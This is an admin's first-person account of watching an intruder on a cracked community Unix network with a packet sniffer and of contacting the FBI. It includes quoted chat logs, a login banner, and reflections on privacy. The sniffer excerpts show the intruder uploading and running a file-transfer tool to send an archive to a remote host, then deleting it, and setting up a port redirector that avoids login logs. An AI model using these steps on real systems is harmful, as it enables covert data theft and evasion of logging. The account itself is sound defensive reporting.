# RootPrompt.org   Nothing but Unix.[Home] [Features] [Programming] [Mac OS X] [Search]

 Feature: Cracked! Part 2: Watching and Waiting

In the second article Noel continues the story of when some Unix boxes that he helped admin were cracked. This article talks about watching the cracker with a sniffer and talking to the the FBI's Computer Crimes Squad.

"On this Linux box I set up a sniffer to watch for traffic going to the ISP and some of the sites we had suspected he was coming from. We thought that by watching him to see were he was coming from and what he was doing that we could get some idea of who he was, what his motivations were and most important what he was doing. We also thought that we could use this to find out what kind of skills he had. Was he a script kiddie, or a super cracker like it was claimed?"

 (Submitted by Noel Wed May 10, 2000 )



Part 2

Watching and Waiting

This is the second part of the story of a community network that was cracked and what was done to recover from it. The first part Cracked! Part1: Denial and truth details the report that leads to the discovery that the community network was indeed cracked and some of the initial reactions. This article talks about how they learned more about the cracker and what they did next.

We were still very concerned that if the cracker realized that we were on to him he would just trash the system to cover up his tracks. We did not feel that we had any way to be sure that we could get all of the backdoors that he could have installed due to length of time that he had been on the system. But at the same time we needed to learn more about what he was doing and were he was coming from. We also hoped that we could gather clues about how he had gotten in. So we decided to run a sniffer to watch what he was doing.

I had a Linux box that was on the same network as the community network machines but was not part of the community network. It had not been up for very long, had most of it's services turned off and had never had more than myself and a few friends log into it. From this I gambled that it probably had not been cracked.

On this Linux box I set up a sniffer to watch for traffic going to the ISP and some of the sites we had suspected he was coming from. We thought that by watching him to see were he was coming from and what he was doing that we could get some idea of who he was, what his motivations were and most important what he was doing. We also thought that we could use this to find out what kind of skills he had. Was he a script kiddie, or a super cracker like it was claimed?

For the sniffer I used sniffit as that was a sniffer that I was most familiar with. I configured it to capture only packets coming to and from sites that we suspected him to be coming from and from the ISP. I could not just turn on a sniffer and let it record all of the packets coming across the wire as there would have been so much traffic recorded that it would not have helped me figure out what the cracker was doing. He would have been hidden in the noise and it would be very difficult if not impossible to see what traffic was his.

I started learning some things about him right from the start.

The first night the sniffer recorded this exchange between the cracker and someone at the ISP:

*hi, there.
*i wonder if bob told you something i've asked him  about
*well that was a while back (last week, and i've talked to 
him  about this 
a few weeks ago for the first time)
*i dunno he said you might do that but you needed 
to think about it or
*well no i'm on someone elses  account now... borrowed if you can put
it that way 
*and i tried to page bob but he's not answering so i thought i'd page
 you and find out whats going on. it's been a while since i asked i
 think i should have an  answer some time soon well, he seems to me
 logged on and not idle at his computer so i  thought i'd try  to page
*yeah i guess i do
*just a normal user account i guess. maybe also a
 static ip address but that's not very important 
*i thought we discussed all that with him when we talked, adn he
should have told you
*guess you dont think thats too important
oh, whatever i want to use it for. email, or ftp, or irc, or whatever
else you have here.
*yes i want a dialup as well as a shell (but chances are i wont use
the dialup much if at all).
*yes, thats where i live.
*i can't find a regular job to do any of those things i like to do
with computers, so currently i'm mostly not working :-( that would be
one way to use it, but i'm not much into that. don't even know what is
satellite codes. that's why i said probably i won't use the dialup
much. i just want to have the option to use it if ever i need
to. well, i'm a programmer, i can program pretty much anything
(although i prefer to  code things that dont require a user interface,
such as device  drivers, etc). 
*also i could of course administrate unix systems if that counts as
work :-)
*yes, i've done that once
*i'm supposed to know a lot about unix secureity anyway

The ISP owner had told me that the cracker claimed to be from a third world country and wanted an legitimate account on their system. He had also hinted that he might want a job in the US. So this conversation seemed to back that up.

Not that this proved he was from a third world country or anything like that, it is as easy to say you are from one place as another. I even thought that he was more likely to be from some other place than the one he claimed.

Once he was finished with this conversation he uploaded some sort of file transfer program through his telnet connection. (I have replaced the hostname to protect the innocent)

$ cat >f
begin 750 f.gz*M'XL("C;P"56'UL4]<5O[9?@@L!'`
$ uudecode f
$ gzip -df f.gz
$ f include.tgz hostname
$ rm f include.tgz

Examining this program later I found that it used UDP to connect to a server daemon to transfer the files to a remote host. It was used in a manner similar to how rcp or scp would work, but seemed to be a custom program. This still did not convince us that he was more than a script kiddie. He could have gotten the code from someone and just be using it.

Later that evening he connects to the ISP and starts talking to what looks like one of the system admins from the ISP about his Linux Kernel module that hides files and directories:

*which things were you impressed with
*hehe.... not if i can help it...
*but some things like that were recently published in the phrack
*of course that stuff isn't as good as mine :-)
*not really, its just that i don't have a particular reason to make
them freely available... i don't see how that would do me any good,
but i can see rather the  opposite
*as to why i code, well, it's not as much fun as it used  to... i've
been doing that for a very long time well, concerning this particular
tool with the hidden directories, it's far from  being entirely
invisible. so if everyone knew how it worked people  could find i
.. and i'd rather them not to , since i'm still using it yep
*but if its loaded through /etc/init it's not that difficult to find it

A few months before this Bugtraq and Phrack had released code for a Linux Kernel module that did about the same things that he said his did. So again I was pretty skeptical about these claims. It is easy to say that you are an elite cracker and much harder to be one. As we learned it can also be hard to spot one.

As I read the sniffer logs I went and tried to connect the logs to logins on the community network machines. To my surprise I found that even through the sniffer was recording connections from our machines there were not corresponding logins recorded in the logs. My first thought was that he was "cleaning" the login logs on our machines. But on closer examination the sniffer logs recorded something interesting on a strange port.

set 2323 23 hostname
He was running a process on our boxes that redirected his connections without requiring him to log in at all. This software listened on a high port and allowed him to set the port to be redirected dynamically. The above example configured his software to redirect any connection to port 2323 on our machine to port 23 (The telnet port) on the ISP's machine.

By using the port redirector he would show up as coming from our system while still not showing anything in our logs.

Non of this proved that the cracker was more than a script kiddie but I was starting to get a little nagging doubt that he might be more than we were giving him credit for. That he might be the highly skilled cracker and programmer that we would later learn that he was.

About this time I got the return phone call from the FBI Computer Crime Squad agent that was working on the ISP's case. He asked me some general questions about our situation. What machines had been cracked, where we saw the connections coming from etc.

Talking to him I felt better because he actually seemed to know something about computers, the Internet and Unix to some extent. We had some past dealings with the local FBI office investigating a child pornography case and they had not known anything about computers or the Internet at all. When the local agent had talked to us about online he was talking about BBS systems.

The FBI Computer Crime Squad agent was very interested in what we said in our login banner or message of the day. He wanted to know what kind of notice we gave about use of our system. He informed me that as the operators of the system we had the legal right to watch the system and sniff the network but that it was not admissible into court once we reported the crime. He sent me via my work email account a selection of possible warning banners that we could show people when they logged into our machines.

I forwarded the request from the FBI and the example banners to our executive director and he in turn talked to our Board of Directors. They had a cow. A big fat cow. We had always tried to protect our users privacy and this seemed to them to be the complete opposite of that. They came up with a very watered down statement that still could not get complete agreement to from all the board members.

Later after the system had been trashed by the cracker and we were all working to recover what we could, we put up the following. Word for word from the example the FBI sent us.

This computer system is for authorized users only. Individuals using this system without authority or in excess of their authority are subject to having all their activities on this system monitored and recorded or examined by any authorized person, including law enforcement, as system personnel deem appropriate. In the course of monitoring individuals improperly using the system or in the course of system maintenance, the activities of authorized users may also be monitored and recorded. Any material so recorded may be disclosed as appropriate. Anyone using this system consents to these terms.

This time there was a unanimous decision by the board to put it up even though it trampled to death the right to privacy that they had held so dear just a few weeks earlier.

Interesting how reality can overwhelm conviction. I still have mixed emotions about this sort of thing. I believe in the right to privacy, and yet I was willing to sniff the network. It is a difficult subject to decide upon. It does not always have a clear cut right and wrong. I am sure that there is a point that you should not go beyond and yet there are some bad bad people out there that will tear down what you have worked to build. I think you must balance your requirements to protect your system with the privacy that your users should have. There are no easy answers to this problem.

So I watched and waited for the cracker to show his hand, to use back doors, to connect to more machines. I waited for the FBI Computer Crime Squad to call and tell me that they had arrested the cracker. I watched for more information that would allow me to plan a way out of the mess we had found ourselves in.

Here is the question that continues to make me wonder, when I was watching the cracker was someone watching me?

Our content can be syndicated: Main page Mac Page

Copyright 1999-2005 Noel Davis. Noel also runs web sites about sailing and kayaking.
All trademarks are the property of their owners.
All articles are owned by their author